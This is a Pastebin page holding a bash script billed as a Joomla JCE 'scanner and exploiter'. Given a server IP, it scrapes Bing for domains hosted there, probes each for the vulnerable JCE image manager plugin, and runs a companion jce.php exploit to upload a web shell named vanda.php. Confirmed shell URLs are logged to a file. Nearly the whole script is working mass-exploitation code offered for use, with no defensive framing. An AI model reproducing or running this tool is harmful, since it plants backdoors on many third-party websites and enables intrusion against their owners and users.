Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # Jce Server Scanner && Exploiter
- # Coded By : Red V!per
- # http://redhat-viper.blogspot.com
- # Report Bugs : RedH4t.Viper@yahoo.com
- # D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
- # Gr33tz : All Turkish && Persian Hacker
- #--------------------------------------------------------------------------------------------------------------------
- #
- # Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com
- # devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
- #
- #-------------------- Red V!per Banner ----------------------------------------------------------------------------
- Banner()
- {
- clear
- echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
- echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
- echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
- echo -e '\E[34m'" || || "; tput sgr0
- echo -e '\E[34m'" ||\E[31m _____ _ __ ___ \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[31m | __ \ | | \ \ / / | \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[31m | |__) |___ __| | \ \ / /| |_ __ ___ _ __ \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[31m | _ // _ \/ _\ | \ \/ / | | '_ \ / _ \ '__| \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[31m | | \ \ __/ (_| | \ / |_| |_) | __/ | \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[31m |_| \_\___|\__,_| \/ (_) .__/ \___|_| \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[31m | | \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[31m |_| \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[32m _ \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[32m (_) \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[32m _ ___ ___ ___ ___ __ _ _ __ _ __ ___ _ __ \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[32m | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__| \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[32m | | (_| __/ \__ \ (_| (_| | | | | | | | __/ | \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[32m | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_| \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[32m _/ | \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||\E[32m|__/ \E[34m|| "; tput sgr0
- echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
- echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
- echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
- sleep 3
- echo
- echo -e "$B /\ (^_^) /\ [public] \n"
- echo -e " -===============================================-\n"
- echo -e " Server Jce Scanner && Exploiter"
- echo
- echo -e " BY : Red V!per\n"
- echo -e " -===============================================-"
- echo
- echo
- echo -e " -========== [ INFO ] ===========-"
- echo
- read -p "[*] Target Ip : " IP
- echo -e "$N"
- }
- #-------------------- Variables ----------------------------------------------------------------------------
- B="\033[1m"
- N="\033[0m"
- L="\033[5m"
- C="\033[m"
- #-------------------- Scanning Jce Targets on Server -------------------------------------------------------
- scan_jce_on_victim()
- {
- page=0
- how_many=1
- single_page=
- last_page_check=
- image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"
- wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `
- cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
- rm -f domain_bing.php
- let page=$page+1
- done
- cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
- for domain in `cat domains.txt`
- do
- GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
- if [ $check -eq 0 ]
- then
- echo "www.$domain" > site.lst
- php jce.php site.lst shells.lst
- GET -s "http://www.$domain/images/stories/vanda.php" | grep "GIF89a1" >> /dev/null;check2=$?
- if [ $check2 -eq 0 ]
- then
- echo -e "$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
- echo -e "$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
- echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
- else
- echo "[-] www.$domain/ [No] "
- fi
- else
- echo "[-] www.$domain/ [No] "
- fi
- done
- rm -rf alldomain_bing.txt
- rm -rf domains.txt
- rm -rf site.lst
- rm -rf shells.lst
- }
- #-------------------- Remove ------------------------------------------------------------------------
- all_remove()
- {
- rm -rf alldomain_bing*
- rm -rf domains_f*
- rm -rf domains_f*
- rm -rf domain_bing*
- rm -rf alldomain_bing*
- rm -rf domains*
- rm -rf jce_server*
- rm -rf site*
- }
- #-------------------- Main Brain :D ------------------------------------------------------------------------
- main()
- {
- chmod +x jce.php
- if [ ! -f shells.lst ]; then
- touch shells.lst ;
- fi
- Banner;
- all_remove;
- scan_jce_on_victim;
- }
- main;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement